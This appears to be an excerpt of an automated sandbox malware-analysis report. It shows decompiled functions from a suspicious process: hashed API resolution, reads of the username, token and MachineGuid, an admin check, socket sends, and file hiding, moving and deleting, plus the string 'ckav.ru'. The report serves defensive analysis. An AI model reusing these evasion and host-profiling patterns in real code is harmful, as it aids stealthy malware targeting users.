                    Yara matches
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040632F() {
                    				char _v8;
                    				void* _t4;
                    				void* _t7;
                    				void* _t16;
                    
                    				_t16 = E00402B7C(0x208);
                    				if(_t16 == 0) {
                    					L4:
                    					_t4 = 0;
                    				} else {
                    					E0040338C(_t16, 0, 0x104);
                    					_t1 =  &_v8; // 0x4143e8
                    					_v8 = 0x208;
                    					_t7 = E00406069(_t16, _t1); // executed
                    					if(_t7 == 0) {
                    						E00402BAB(_t16);
                    						goto L4;
                    					} else {
                    						_t4 = _t16;
                    					}
                    				}
                    				return _t4;
                    			}







                    0x00406340
                    0x00406345
                    0x00406373
                    0x00406373
                    0x00406347
                    0x0040634f
                    0x00406354
                    0x00406357
                    0x0040635c
                    0x00406366
                    0x0040636d
                    0x00000000
                    0x00406368
                    0x00406368
                    0x00406368
                    0x00406366
                    0x0040637a

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser_wmemset
                    • String ID: CA
                    • API String ID: 2078537776-1052703068
                    • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                    				int _t7;
                    				void* _t8;
                    
                    				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                    				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                    				return _t7;
                    			}





                    0x00406094
                    0x004060a8
                    0x004060ab

                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                    				_Unknown_base(*)()* _t5;
                    				void* _t6;
                    
                    				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                    				_t1 =  &_a8; // 0x403173
                    				_t5 = GetProcAddress(_a4,  *_t1); // executed
                    				return _t5;
                    			}





                    0x00402c10
                    0x00402c15
                    0x00402c1b
                    0x00402c1e

                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00404A52(void* _a4, char* _a8, char* _a12) {
                    				void* _v8;
                    				int _v12;
                    				void* __ebx;
                    				char* _t10;
                    				long _t13;
                    				char* _t27;
                    
                    				_push(_t21);
                    				_t27 = E00402B7C(0x208);
                    				if(_t27 == 0) {
                    					L4:
                    					_t10 = 0;
                    				} else {
                    					E00402B4E(_t27, 0, 0x208);
                    					_v12 = 0x208;
                    					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                    					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                    					if(_t13 != 0) {
                    						E00402BAB(_t27);
                    						goto L4;
                    					} else {
                    						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                    						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                    						E00404A39(_v8); // executed
                    						_t10 = _t27;
                    					}
                    				}
                    				return _t10;
                    			}









                    0x00404a56
                    0x00404a65
                    0x00404a6a
                    0x00404ad1
                    0x00404ad1
                    0x00404a6c
                    0x00404a71
                    0x00404a79
                    0x00404a85
                    0x00404a9a
                    0x00404a9e
                    0x00404acb
                    0x00000000
                    0x00404aa0
                    0x00404aac
                    0x00404abc
                    0x00404ac1
                    0x00404ac6
                    0x00404ac6
                    0x00404a9e
                    0x00404ad9

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402BAB(void* _a4) {
                    				void* _t3;
                    				char _t5;
                    
                    				if(_a4 != 0) {
                    					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                    					return _t5;
                    				}
                    				return _t3;
                    			}





                    0x00402bb2
                    0x00402bc0
                    0x00000000
                    0x00402bc0
                    0x00402bc7

                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                    • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$FreeProcess
                    • String ID:
                    • API String ID: 3859560861-0
                    • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                    • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                    • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                    • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 40%
                    			E004060BD(void* __eflags) {
                    				signed int _v8;
                    				char _v12;
                    				short _v16;
                    				char _v20;
                    				void* __ebx;
                    				intOrPtr* _t12;
                    				signed int _t13;
                    				intOrPtr* _t14;
                    				signed int _t15;
                    				void* _t24;
                    
                    				_v16 = 0x500;
                    				_v20 = 0;
                    				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                    				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                    				_v8 = _t13;
                    				if(_t13 != 0) {
                    					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                    					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                    					asm("sbb eax, eax");
                    					_v8 = _v8 &  ~_t15;
                    					E0040604F(_v12);
                    					return _v8;
                    				}
                    				return _t13;
                    			}













                    0x004060c6
                    0x004060d5
                    0x004060d8
                    0x004060f4
                    0x004060f6
                    0x004060fb
                    0x0040610a
                    0x00406115
                    0x0040611c
                    0x0040611e
                    0x00406121
                    0x00000000
                    0x0040612a
                    0x0040612f

                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                    				void* _t3;
                    				int _t5;
                    
                    				_t3 = E00403D4D(__eflags, _a4); // executed
                    				if(_t3 == 0) {
                    					__eflags = 0;
                    					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                    					_t5 = CreateDirectoryW(_a4, 0); // executed
                    					return _t5;
                    				} else {
                    					return 1;
                    				}
                    			}





                    0x00403c68
                    0x00403c70
                    0x00403c78
                    0x00403c82
                    0x00403c8b
                    0x00403c8f
                    0x00403c72
                    0x00403c76
                    0x00403c76

                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0040642C(void* __eflags) {
                    				short _v40;
                    				intOrPtr* _t6;
                    				void* _t10;
                    
                    				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                    				 *_t6( &_v40); // executed
                    				return 0 | _v40 == 0x00000009;
                    			}






                    0x0040643c
                    0x00406445
                    0x00406454

                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				intOrPtr _t5;
                    
                    				_t5 = _a12;
                    				if(_t5 == 0) {
                    					_t5 = E00405D0B(_a8) + 1;
                    				}
                    				__imp__#19(_a4, _a8, _t5, 0); // executed
                    				return _t5;
                    			}




                    0x00404eed
                    0x00404ef2
                    0x00404efd
                    0x00404efd
                    0x00404f07
                    0x00404f0e

                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                    				int _t6;
                    				void* _t7;
                    
                    				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                    				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                    				return _t6;
                    			}





                    0x00403bdd
                    0x00403beb
                    0x00403bee

                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040427D(WCHAR* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                    				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                    				return _t4;
                    			}





                    0x0040428a
                    0x00404297
                    0x0040429a

                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404A19(void* _a4, short* _a8, void** _a12) {
                    				long _t5;
                    				void* _t6;
                    
                    				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                    				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                    				return _t5;
                    			}





                    0x00404a27
                    0x00404a35
                    0x00404a38

                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C40(void* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                    				_t4 = FindCloseChangeNotification(_a4); // executed
                    				return _t4;
                    			}





                    0x00403c4d
                    0x00403c55
                    0x00403c58

                    APIs
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C08(WCHAR* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                    				_t4 = DeleteFileW(_a4); // executed
                    				return _t4;
                    			}





                    0x00403c15
                    0x00403c1d
                    0x00403c20

                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402C1F(WCHAR* _a4) {
                    				struct HINSTANCE__* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                    				_t4 = LoadLibraryW(_a4); // executed
                    				return _t4;
                    			}





                    0x00402c2c
                    0x00402c34
                    0x00402c37

                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BEF(void* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                    				_t4 = FindClose(_a4); // executed
                    				return _t4;
                    			}





                    0x00403bfc
                    0x00403c04
                    0x00403c07

                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BB7(WCHAR* _a4) {
                    				long _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                    				_t4 = GetFileAttributesW(_a4); // executed
                    				return _t4;
                    			}





                    0x00403bc4
                    0x00403bcc
                    0x00403bcf

                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004049FF(void* _a4) {
                    				long _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                    				_t3 = RegCloseKey(_a4); // executed
                    				return _t3;
                    			}





                    0x00404a0d
                    0x00404a15
                    0x00404a18

                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
